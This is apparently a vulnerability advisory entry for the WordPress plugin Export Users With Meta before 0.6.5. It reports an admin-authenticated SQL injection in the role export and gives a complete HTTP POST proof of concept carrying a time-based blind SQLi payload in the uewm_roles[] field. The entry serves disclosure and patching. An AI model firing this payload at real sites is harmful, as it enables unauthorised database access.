WordPress Plugin Vulnerabilities
Export Users With Meta < 0.6.5 - Admin+ SQLi
Description
The plugin did not escape the list of roles to export before using them in a SQL statement in the export functionality, available to admins, leading to an authenticated SQL Injection.
Proof of Concept
POST /wp-admin/users.php?page=uewm_settings HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------91314853327906118943368521591 Content-Length: 1309 Connection: close Cookie: [admin+] Upgrade-Insecure-Requests: 1 -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name="uewm_roles[]" editor'%20AND%20(select*from(select(sleep(10)))a)+' -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name="uewm_use_custom_csv_settings" 1 -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name="uewm_field_separator" custom -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name="uewm_custom_field_separator" = -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name="uewm_text_qualifier" double-quote -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name="uewm_custom_text_qualifier" " -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name="save" Save changes -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name="_wpnonce" 0c475bfd14 -----------------------------91314853327906118943368521591 Content-Disposition: form-data; name="_wp_http_referer" /wp-admin/users.php?page=uewm_settings -----------------------------91314853327906118943368521591--
Affects Plugins
References
Classification
Type
SQLI
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Asif Nawaz Minhas
Submitter
Asif Nawaz Minhas
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-06-21 (about 2 years ago)
Added
2021-06-21 (about 2 years ago)
Last Updated
2023-04-12 (about 1 years ago)